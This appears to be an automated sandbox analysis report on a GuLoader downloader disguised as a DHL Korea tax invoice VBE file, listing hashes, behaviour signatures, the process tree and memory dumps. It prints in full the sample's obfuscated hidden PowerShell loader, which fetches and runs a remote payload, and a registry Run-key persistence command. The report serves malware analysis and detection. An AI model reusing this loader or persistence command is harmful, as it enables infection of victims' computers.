Analysis
-
max time kernel
122s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
24-06-2024 15:51
Static task
static1
Behavioral task
behavioral1
Sample
DHL_Korea_Tax_Invoice_6064457135pdf.vbe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
DHL_Korea_Tax_Invoice_6064457135pdf.vbe
Resource
win10v2004-20240508-en
General
-
Target
DHL_Korea_Tax_Invoice_6064457135pdf.vbe
-
Size
9KB
-
MD5
27b373a50962c2f8fe26274c147195cd
-
SHA1
1bba2d71036d371f78d628ac9c6cc13221d9ee89
-
SHA256
3c5f563b531f76c538885b14a185f975e7400b4acb28a03fd950333516861eee
-
SHA512
dde61a1a192e888bd47135be665678b2334efb8d860ec0ea2224e1d17b95da3cbdad3fb79eff428ae99e0514d8e301d2b424c54127f8f621889e95a4ed888111
-
SSDEEP
192:pzu36F4teCvSV/mcS36C2W3E11hEAGst4QoKVYHva607dqh2eyTxN8mSVqn:436Se4z36A3cDt/Rdb8miqn
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 2060 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Processes:
resource yara_rule behavioral1/memory/944-25-0x0000000000400000-0x0000000000581000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\Epicarp = "%Easels% -w 1 $Videreuddannelses=(Get-ItemProperty -Path 'HKCU:\\Drivtmmers\\').Loplukkeres;%Easels% ($Videreuddannelses)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 944 wab.exe 944 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2540 powershell.exe 944 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2540 set thread context of 944 2540 powershell.exe wab.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepid process 2060 powershell.exe 2540 powershell.exe 2540 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exepid process 2540 powershell.exe 2540 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2060 powershell.exe Token: SeDebugPrivilege 2540 powershell.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
WScript.exepowershell.exepowershell.exewab.execmd.exedescription pid process target process PID 2580 wrote to memory of 2060 2580 WScript.exe powershell.exe PID 2580 wrote to memory of 2060 2580 WScript.exe powershell.exe PID 2580 wrote to memory of 2060 2580 WScript.exe powershell.exe PID 2060 wrote to memory of 2892 2060 powershell.exe cmd.exe PID 2060 wrote to memory of 2892 2060 powershell.exe cmd.exe PID 2060 wrote to memory of 2892 2060 powershell.exe cmd.exe PID 2060 wrote to memory of 2540 2060 powershell.exe powershell.exe PID 2060 wrote to memory of 2540 2060 powershell.exe powershell.exe PID 2060 wrote to memory of 2540 2060 powershell.exe powershell.exe PID 2060 wrote to memory of 2540 2060 powershell.exe powershell.exe PID 2540 wrote to memory of 2232 2540 powershell.exe cmd.exe PID 2540 wrote to memory of 2232 2540 powershell.exe cmd.exe PID 2540 wrote to memory of 2232 2540 powershell.exe cmd.exe PID 2540 wrote to memory of 2232 2540 powershell.exe cmd.exe PID 2540 wrote to memory of 1824 2540 powershell.exe wab.exe PID 2540 wrote to memory of 1824 2540 powershell.exe wab.exe PID 2540 wrote to memory of 1824 2540 powershell.exe wab.exe PID 2540 wrote to memory of 1824 2540 powershell.exe wab.exe PID 2540 wrote to memory of 944 2540 powershell.exe wab.exe PID 2540 wrote to memory of 944 2540 powershell.exe wab.exe PID 2540 wrote to memory of 944 2540 powershell.exe wab.exe PID 2540 wrote to memory of 944 2540 powershell.exe wab.exe PID 2540 wrote to memory of 944 2540 powershell.exe wab.exe PID 2540 wrote to memory of 944 2540 powershell.exe wab.exe PID 944 wrote to memory of 1404 944 wab.exe cmd.exe PID 944 wrote to memory of 1404 944 wab.exe cmd.exe PID 944 wrote to memory of 1404 944 wab.exe cmd.exe PID 944 wrote to memory of 1404 944 wab.exe cmd.exe PID 1404 wrote to memory of 1640 1404 cmd.exe reg.exe PID 1404 wrote to memory of 1640 1404 cmd.exe reg.exe PID 1404 wrote to memory of 1640 1404 cmd.exe reg.exe PID 1404 wrote to memory of 1640 1404 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL_Korea_Tax_Invoice_6064457135pdf.vbe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden "cls;write 'Strainableness Vinhandler Unjagtigheder Manipuleringers subsumtionernes Klippegulve Executer Ketogenic Palmeries Stringmaking';$Dramaticism = 1;Function Hkeraands($Uddebatterede254){$Nine=$Uddebatterede254.Length-$Dramaticism;$Uricacidemia='SUBSTRIN';$Uricacidemia+='G';For( $Financieret=4;$Financieret -lt $Nine;$Financieret+=5){$Strainableness+=$Uddebatterede254.$Uricacidemia.Invoke( $Financieret, $Dramaticism);}$Strainableness;}function Karolinger($Oplivelses228){ & ($Sobralia) ($Oplivelses228);}$Overtroubling=Hkeraands 'LevnM KonoS mmzSt.liRen lGudml Ha.adosh/Para5 Hem.Raa 0Ddn, M.li(DamaWUltriDrtrntho,dAn toSprowAbansF rl FestNYechTBryl Roug1Fin.0Ce,l.Cl s0Pult; Tin KlleWAst.iAb,dnTri,6 De 4Omsk;Fors J.hsxFlip6Tegn4Biav;Pro BowlrZambvAdst:r,kl1Accr2Fird1Grn,.Endo0Bala)Beta wennGHandeFlamcStr kIncooFus,/Rel,2No,a0 Le 1Trev0Kult0St.t1Prlu0Acet1Glad AadsFCanciOctar LeneStorfArchoExtex lti/scyt1Void2Camp1Sli.. Mat0 als ';$Disputativeness=Hkeraands 'HoveU SupsI nieForrr Fo.-TaktAReprgDureeSlovnKirstFusi ';$subsumtionernes=Hkeraands ' LymhSvigt TyvtS ukpBort: Mod/ Pa /PatrmBhimaDiscsS.umoDrev.DowngY ere bry/GildwBilapA kl-SkidaMic dMe,omIbruiBlokn ram/Ar,iF EnglRetuuUvitin cod Sa,eDisc.,odoxT,dssRi on Lag ';$underthrust=Hkeraands 'Kva,>stra ';$Sobralia=Hkeraands 'Pyfei NeoeS,pexUmul ';$Sogneraadsmedlemmers='Ketogenic';$Acalycinous = Hkeraands 'Ferte Gy.cShakhGruboK,de Subn% RenaNonmpC,arpfigudTe,oa de.tStvlaSamm%Fors\ ,crCNudiaFlomnjungdPersoDemalKonflUndeeZi.caCalc.,ogtLCamenGen.gDipo .ype&Supe&D ss Ma aeUndfcC.lihBoreoSam. HndtVing ';Karolinger (Hkeraands 'V,lf$Unfig orlW,elo Un b OmkaN dglPhas:DaveOlukrpMedar Ti e ndrgTortnBrn.iLandnFes gsysteHo arPropn Resek.vi=Bo,i( Felc FyrmLatyd,rev Tnk/Bes c Tro Una.$ proACl acDk aaFattlhoveyTermcInc.iFingnSubmoRegau Skyssutt)Forh ');Karolinger (Hkeraands 'Va y$Lng,gV telScoroCymabSympaBepolPrfi: .amMHabeaRegnnRespiNet,pDrukuGei.llaboe F.arCalci St.nTvregKe.peOmpor foss adi=,jem$IsogsKombuBeunbKorrscinnuSt.nmPinwt omi Sn,oSvi nDubhecatar StanOrate reisLup..Fikss,unkpGhoslUd.ri CortS at( Jor$utf,uIns.n ocidSn fe rykr ubpt .pihHornrGoyauT.aus Balt Unn) Zos ');Karolinger (Hkeraands 's,ne[PickNJohneLflatTrem.MomsSun tePiglr CucvfiltiVi lc GreeBal.P,oreos,eaiFlucnks.st irpM.umbaBivenPyr.aStatgAlaneAn.er Pro]Yder:,eas:EsbaS P.seT arcCauduFakerDresi P,ctKni.y Mo.PTrylrSluroTreltSmouoautocNa ooGri,lJord ,yci=Re,e Ind[ RefNHoveeF astGaat.W inSRegieOratc TiluNondrA griPfaltGrnsy.laePunf rMe.lofa.vtLetvovivecOve.oBirdlKjerTStopySlippUnsteGeol]Kali:For,:SmagTOmrylXy ysScil1Apom2Roll ');$subsumtionernes=$Manipuleringers[0];$Unsleeping= (Hkeraands ' Tra$Re egPastlA teoPlasb SixaTonolO,ri:Intec rgeoTriolefteeOut oSstnpStrat SkreChrorTyt.aReprlTak.=stopNKonfeAfvawBrev-C.nvO,tribturajG.eye SticSc,rtFras Wa,nS .oryFa osEightMyele.vermChlo.FolkNIne e TratVisi.DeacWBarneOmfabTredCKysslAuxoiSndreSplenFe it');$Unsleeping+=$Opregningerne[1];Karolinger ($Unsleeping);Karolinger (Hkeraands 'Solu$Cre,cBie oSlg.lHockeCanuoI,dipSmigtNorde TegrSpuraGoallTjen. Ha HAcroe Conat.lvdBlane Asyr Phos Van[Forr$ NecD Br,idrams,rlgp entuIxodtAnteaWardtrefeiViriv ScrevilknIntee FissSnuss R,g]Ferr=Lo.s$AmtsOGebrvForfeUdderKooptEditrRet oTheauU,babIndsl br iL esnScrigInte ');$prebesetting=Hkeraands 'Gla,$PhoscMnteoEnerl PileKlejo arp InstShoweAprerK.aga.yrel ,ub.KokoD ,imoBilfwcontnhassl .azoHarnaRunid L.nFSegriBuillVirteKon (Spru$,remsMe suS udbPa ms SuruBrocmBilltK.liiUnbuoInt nSnareGogorByggnFinheSilksHype, Brn$SemiUBotsn Ligs HeleSofacKalouA,enrSiale unon SemeJyllsafsksTra )Flus ';$Unsecureness=$Opregningerne[0];Karolinger (Hkeraands 'Fors$MicrgLiqulDe.io.karb SanaFr mlInco:IdioP.rane Unsr,intsMagtoSilknVa teNongl Zo,sT,rg=,ane( F,uTNoneePhidsSp.rt B.a- TekPValeaConvtDesphErsa Digi$Se,iUge,lnEnkesPr,mePligcL nguDozer QuieB mbn tjee H vsSnursSpar)Luft ');while (!$Personels) {Karolinger (Hkeraands 'Comm$Ghougdrypl looM lablc caInjul Ca,:.gebPRockiBesml Skre tomwRecoo,edrr Deft angsPres= moi$AfkatGabtr,aalu tileHabi ') ;Karolinger $prebesetting;Karolinger (Hkeraands 'Sto SBermt .smaN adrPiqut Dis-KumuSPrillAnneeProdeBr.ap dog Dv.d4dish ');Karolinger (Hkeraands 'L.kr$ GrugpantlBru onondbOutkaFld l.ilh:Op.iP Bl,eUdforPerisJomfoBid.nBankeBesylAnorsUps =,sbe(cereTSgete,inds,nletEnto-geodPHotdaIdo,tAssohAmni Inde$.ottUTilan resK,raeC olcElvau nflrDdsdeDamrnF,lseRee.sOldwsUna.) ang ') ;Karolinger (Hkeraands 'Bron$HarmgCystlPh.toHmosbOp raBerelRadi: Ov U IbrnAtoljs,itaMucogAufatSkv.iAa yg Helh liteUnd.dBroceDencr Tse=man,$MyrtgDatal Tego Fi.bPigea Sknlbipi:.jtiVLy.tiRe tn OvehSystaScrinMu cd TrilFilme V nrMest+,alt+Sige%Amin$ SidMpr.gaRe,unUnseiSmerp t,eu panlSubseMas rDocuiSc.lnContg ,ubeTiggrPressspon.KlumcL,igoGuiduInvinImpetExtr ') ;$subsumtionernes=$Manipuleringers[$Unjagtigheder];}$Ophrenes121=302900;$Unintoxicating=28604;Karolinger (Hkeraands 'For.$ ,dbgNedtlB dsoTidsbCo maSkrulOver:LejePDvstaSpeclTirsmGambe RadrGl.pi Pare SfysMosa Co,g=Reli RserGJuleeOro.tRke -TogsC lvtoAntanHor tAntre HornSlietFont Udbo$MellUSkolnTearsPro.e juscSnupuSteer Ha,eNidinI dieops sGa,osSkae ');Karolinger (Hkeraands 'Syre$AdgagAur.l.orpoAp.rb.orhave tl all: CuiSBnkem hiaAmbdaSexag ArerDopniEndanlandeElved Fynenavns.aro Trol=Fur, Tull[AftaS adryTingsPrint drneE,spmHimm.Inn.CAs,ro.estnTillvFioreCollrBatwtVita]E hy: soc:,pprFNed rf,rloObj,m ConB GifaVelvsSma,eRhin6Bobl4,ndeSFrittHjttr U,wiUhelnPhysgSpre(Tilv$OcelPCo.kaMi ilForemGrobeKissrRekvi ForeStrasBraz) non ');Karolinger (Hkeraands 'To t$ H,ag Cool ProoSte bSaleaDimelForm:Th,rNMiskuAgnimAbsuiSurpnbrsnoA peu Jags.eltnPreeeU.prsNo.asA et Test=Gi u Pen[,larSSwanyThebsGardt Undepa tm Sym.CounT La,e FljxF.rmtreac.VagoE VernMudhcLarmoLemud B eiTa,hnIn sg viz]Pink:Ptil:Sy.lA UdpSTilsCFontIB muIWhut.Per G St,eDu,ctNonsS DowtHalvrRebliYawlnRvejgTele(Svej$PummSK olmTomaaHo,eaOptagF inr nexiAr hnNovoeMafid ,rue.eeks Cha)Skil ');Karolinger (Hkeraands 'V,lg$,lasg.idelS.reoHypob divaEpiclhvss:Lu alPhoba queyAmorl st.aUkal= Ka.$ palNSco.u No,mDekaiMaldn Rano.anduOr.ns sotnAfsoe Kams,andsA.se. phosAfg,uLbetb ,hos Af,tEuskropspiTelenUnshg Ind( Tud$Key,OEntup GibhFygerUngre idenChefeJ ersSepa1 Tor2 Fo 1Glor,Mu,t$ Hy,U .udnHereiRepanC,axt uroBrnex.ncaiCoffcDendaPhottSinkiSovsn OpegKlat)Disp ');Karolinger $layla;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Candollea.Lng && echo t"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Strainableness Vinhandler Unjagtigheder Manipuleringers subsumtionernes Klippegulve Executer Ketogenic Palmeries Stringmaking';$Dramaticism = 1;Function Hkeraands($Uddebatterede254){$Nine=$Uddebatterede254.Length-$Dramaticism;$Uricacidemia='SUBSTRIN';$Uricacidemia+='G';For( $Financieret=4;$Financieret -lt $Nine;$Financieret+=5){$Strainableness+=$Uddebatterede254.$Uricacidemia.Invoke( $Financieret, $Dramaticism);}$Strainableness;}function Karolinger($Oplivelses228){ & ($Sobralia) ($Oplivelses228);}$Overtroubling=Hkeraands 'LevnM KonoS mmzSt.liRen lGudml Ha.adosh/Para5 Hem.Raa 0Ddn, M.li(DamaWUltriDrtrntho,dAn toSprowAbansF rl FestNYechTBryl Roug1Fin.0Ce,l.Cl s0Pult; Tin KlleWAst.iAb,dnTri,6 De 4Omsk;Fors J.hsxFlip6Tegn4Biav;Pro BowlrZambvAdst:r,kl1Accr2Fird1Grn,.Endo0Bala)Beta wennGHandeFlamcStr kIncooFus,/Rel,2No,a0 Le 1Trev0Kult0St.t1Prlu0Acet1Glad AadsFCanciOctar LeneStorfArchoExtex lti/scyt1Void2Camp1Sli.. Mat0 als ';$Disputativeness=Hkeraands 'HoveU SupsI nieForrr Fo.-TaktAReprgDureeSlovnKirstFusi ';$subsumtionernes=Hkeraands ' LymhSvigt TyvtS ukpBort: Mod/ Pa /PatrmBhimaDiscsS.umoDrev.DowngY ere bry/GildwBilapA kl-SkidaMic dMe,omIbruiBlokn ram/Ar,iF EnglRetuuUvitin cod Sa,eDisc.,odoxT,dssRi on Lag ';$underthrust=Hkeraands 'Kva,>stra ';$Sobralia=Hkeraands 'Pyfei NeoeS,pexUmul ';$Sogneraadsmedlemmers='Ketogenic';$Acalycinous = Hkeraands 'Ferte Gy.cShakhGruboK,de Subn% RenaNonmpC,arpfigudTe,oa de.tStvlaSamm%Fors\ ,crCNudiaFlomnjungdPersoDemalKonflUndeeZi.caCalc.,ogtLCamenGen.gDipo .ype&Supe&D ss Ma aeUndfcC.lihBoreoSam. HndtVing ';Karolinger (Hkeraands 'V,lf$Unfig orlW,elo Un b OmkaN dglPhas:DaveOlukrpMedar Ti e ndrgTortnBrn.iLandnFes gsysteHo arPropn Resek.vi=Bo,i( Felc FyrmLatyd,rev Tnk/Bes c Tro Una.$ proACl acDk aaFattlhoveyTermcInc.iFingnSubmoRegau Skyssutt)Forh ');Karolinger (Hkeraands 'Va y$Lng,gV telScoroCymabSympaBepolPrfi: .amMHabeaRegnnRespiNet,pDrukuGei.llaboe F.arCalci St.nTvregKe.peOmpor foss adi=,jem$IsogsKombuBeunbKorrscinnuSt.nmPinwt omi Sn,oSvi nDubhecatar StanOrate reisLup..Fikss,unkpGhoslUd.ri CortS at( Jor$utf,uIns.n ocidSn fe rykr ubpt .pihHornrGoyauT.aus Balt Unn) Zos ');Karolinger (Hkeraands 's,ne[PickNJohneLflatTrem.MomsSun tePiglr CucvfiltiVi lc GreeBal.P,oreos,eaiFlucnks.st irpM.umbaBivenPyr.aStatgAlaneAn.er Pro]Yder:,eas:EsbaS P.seT arcCauduFakerDresi P,ctKni.y Mo.PTrylrSluroTreltSmouoautocNa ooGri,lJord ,yci=Re,e Ind[ RefNHoveeF astGaat.W inSRegieOratc TiluNondrA griPfaltGrnsy.laePunf rMe.lofa.vtLetvovivecOve.oBirdlKjerTStopySlippUnsteGeol]Kali:For,:SmagTOmrylXy ysScil1Apom2Roll ');$subsumtionernes=$Manipuleringers[0];$Unsleeping= (Hkeraands ' Tra$Re egPastlA teoPlasb SixaTonolO,ri:Intec rgeoTriolefteeOut oSstnpStrat SkreChrorTyt.aReprlTak.=stopNKonfeAfvawBrev-C.nvO,tribturajG.eye SticSc,rtFras Wa,nS .oryFa osEightMyele.vermChlo.FolkNIne e TratVisi.DeacWBarneOmfabTredCKysslAuxoiSndreSplenFe it');$Unsleeping+=$Opregningerne[1];Karolinger ($Unsleeping);Karolinger (Hkeraands 'Solu$Cre,cBie oSlg.lHockeCanuoI,dipSmigtNorde TegrSpuraGoallTjen. Ha HAcroe Conat.lvdBlane Asyr Phos Van[Forr$ NecD Br,idrams,rlgp entuIxodtAnteaWardtrefeiViriv ScrevilknIntee FissSnuss R,g]Ferr=Lo.s$AmtsOGebrvForfeUdderKooptEditrRet oTheauU,babIndsl br iL esnScrigInte ');$prebesetting=Hkeraands 'Gla,$PhoscMnteoEnerl PileKlejo arp InstShoweAprerK.aga.yrel ,ub.KokoD ,imoBilfwcontnhassl .azoHarnaRunid L.nFSegriBuillVirteKon (Spru$,remsMe suS udbPa ms SuruBrocmBilltK.liiUnbuoInt nSnareGogorByggnFinheSilksHype, Brn$SemiUBotsn Ligs HeleSofacKalouA,enrSiale unon SemeJyllsafsksTra )Flus ';$Unsecureness=$Opregningerne[0];Karolinger (Hkeraands 'Fors$MicrgLiqulDe.io.karb SanaFr mlInco:IdioP.rane Unsr,intsMagtoSilknVa teNongl Zo,sT,rg=,ane( F,uTNoneePhidsSp.rt B.a- TekPValeaConvtDesphErsa Digi$Se,iUge,lnEnkesPr,mePligcL nguDozer QuieB mbn tjee H vsSnursSpar)Luft ');while (!$Personels) {Karolinger (Hkeraands 'Comm$Ghougdrypl looM lablc caInjul Ca,:.gebPRockiBesml Skre tomwRecoo,edrr Deft angsPres= moi$AfkatGabtr,aalu tileHabi ') ;Karolinger $prebesetting;Karolinger (Hkeraands 'Sto SBermt .smaN adrPiqut Dis-KumuSPrillAnneeProdeBr.ap dog Dv.d4dish ');Karolinger (Hkeraands 'L.kr$ GrugpantlBru onondbOutkaFld l.ilh:Op.iP Bl,eUdforPerisJomfoBid.nBankeBesylAnorsUps =,sbe(cereTSgete,inds,nletEnto-geodPHotdaIdo,tAssohAmni Inde$.ottUTilan resK,raeC olcElvau nflrDdsdeDamrnF,lseRee.sOldwsUna.) ang ') ;Karolinger (Hkeraands 'Bron$HarmgCystlPh.toHmosbOp raBerelRadi: Ov U IbrnAtoljs,itaMucogAufatSkv.iAa yg Helh liteUnd.dBroceDencr Tse=man,$MyrtgDatal Tego Fi.bPigea Sknlbipi:.jtiVLy.tiRe tn OvehSystaScrinMu cd TrilFilme V nrMest+,alt+Sige%Amin$ SidMpr.gaRe,unUnseiSmerp t,eu panlSubseMas rDocuiSc.lnContg ,ubeTiggrPressspon.KlumcL,igoGuiduInvinImpetExtr ') ;$subsumtionernes=$Manipuleringers[$Unjagtigheder];}$Ophrenes121=302900;$Unintoxicating=28604;Karolinger (Hkeraands 'For.$ ,dbgNedtlB dsoTidsbCo maSkrulOver:LejePDvstaSpeclTirsmGambe RadrGl.pi Pare SfysMosa Co,g=Reli RserGJuleeOro.tRke -TogsC lvtoAntanHor tAntre HornSlietFont Udbo$MellUSkolnTearsPro.e juscSnupuSteer Ha,eNidinI dieops sGa,osSkae ');Karolinger (Hkeraands 'Syre$AdgagAur.l.orpoAp.rb.orhave tl all: CuiSBnkem hiaAmbdaSexag ArerDopniEndanlandeElved Fynenavns.aro Trol=Fur, Tull[AftaS adryTingsPrint drneE,spmHimm.Inn.CAs,ro.estnTillvFioreCollrBatwtVita]E hy: soc:,pprFNed rf,rloObj,m ConB GifaVelvsSma,eRhin6Bobl4,ndeSFrittHjttr U,wiUhelnPhysgSpre(Tilv$OcelPCo.kaMi ilForemGrobeKissrRekvi ForeStrasBraz) non ');Karolinger (Hkeraands 'To t$ H,ag Cool ProoSte bSaleaDimelForm:Th,rNMiskuAgnimAbsuiSurpnbrsnoA peu Jags.eltnPreeeU.prsNo.asA et Test=Gi u Pen[,larSSwanyThebsGardt Undepa tm Sym.CounT La,e FljxF.rmtreac.VagoE VernMudhcLarmoLemud B eiTa,hnIn sg viz]Pink:Ptil:Sy.lA UdpSTilsCFontIB muIWhut.Per G St,eDu,ctNonsS DowtHalvrRebliYawlnRvejgTele(Svej$PummSK olmTomaaHo,eaOptagF inr nexiAr hnNovoeMafid ,rue.eeks Cha)Skil ');Karolinger (Hkeraands 'V,lg$,lasg.idelS.reoHypob divaEpiclhvss:Lu alPhoba queyAmorl st.aUkal= Ka.$ palNSco.u No,mDekaiMaldn Rano.anduOr.ns sotnAfsoe Kams,andsA.se. phosAfg,uLbetb ,hos Af,tEuskropspiTelenUnshg Ind( Tud$Key,OEntup GibhFygerUngre idenChefeJ ersSepa1 Tor2 Fo 1Glor,Mu,t$ Hy,U .udnHereiRepanC,axt uroBrnex.ncaiCoffcDendaPhottSinkiSovsn OpegKlat)Disp ');Karolinger $layla;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Candollea.Lng && echo t"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epicarp" /t REG_EXPAND_SZ /d "%Easels% -w 1 $Videreuddannelses=(Get-ItemProperty -Path 'HKCU:\Drivtmmers\').Loplukkeres;%Easels% ($Videreuddannelses)"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epicarp" /t REG_EXPAND_SZ /d "%Easels% -w 1 $Videreuddannelses=(Get-ItemProperty -Path 'HKCU:\Drivtmmers\').Loplukkeres;%Easels% ($Videreuddannelses)"6⤵
- Adds Run key to start application
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Candollea.LngFilesize
431KB
MD51108e06376421f62462c79cc5ffc66e6
SHA18a274698fc2796c729b3b849197607468361031d
SHA256976127a2f0eae89e47e054f75ebe9e4218b264071a11411ce77b20d4124431fb
SHA5129cdffb2ba2d7b7e62b528a8b9009cefdd65348b68f7fbfd78ad33372fde47ca7c73625c6fc47e458adf5ef5ae355b6756fa871257370bc258bdc51253168ba4a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YVWTNS3HUJBU1ZLITM27.tempFilesize
7KB
MD55ef88b19276f8b088ae9fe7a283138c6
SHA14c7e96c8b3e71859347e70069d6bf34931875999
SHA25655e442cda482c89e23c2e470eac1f07bb5c18d5d1d60c206541c5c377f85b19a
SHA512718a03a9d6eda084ccce1a9795191f55aaffd0f76e6899b2ad3763e9a6afdd5101a47649db30a98ecac1f60b3fad3399d4f199492882d5eb57cba4debf9dabe1
-
memory/944-24-0x0000000000590000-0x0000000004C5B000-memory.dmpFilesize
70.8MB
-
memory/944-25-0x0000000000400000-0x0000000000581000-memory.dmpFilesize
1.5MB
-
memory/2060-8-0x000007FEF5E70000-0x000007FEF680D000-memory.dmpFilesize
9.6MB
-
memory/2060-10-0x000007FEF5E70000-0x000007FEF680D000-memory.dmpFilesize
9.6MB
-
memory/2060-9-0x000007FEF5E70000-0x000007FEF680D000-memory.dmpFilesize
9.6MB
-
memory/2060-11-0x000007FEF5E70000-0x000007FEF680D000-memory.dmpFilesize
9.6MB
-
memory/2060-4-0x000007FEF612E000-0x000007FEF612F000-memory.dmpFilesize
4KB
-
memory/2060-7-0x000007FEF5E70000-0x000007FEF680D000-memory.dmpFilesize
9.6MB
-
memory/2060-17-0x000007FEF5E70000-0x000007FEF680D000-memory.dmpFilesize
9.6MB
-
memory/2060-18-0x000007FEF612E000-0x000007FEF612F000-memory.dmpFilesize
4KB
-
memory/2060-6-0x0000000002220000-0x0000000002228000-memory.dmpFilesize
32KB
-
memory/2060-5-0x000000001B270000-0x000000001B552000-memory.dmpFilesize
2.9MB
-
memory/2060-26-0x000007FEF5E70000-0x000007FEF680D000-memory.dmpFilesize
9.6MB
-
memory/2540-19-0x0000000006230000-0x000000000A8FB000-memory.dmpFilesize
70.8MB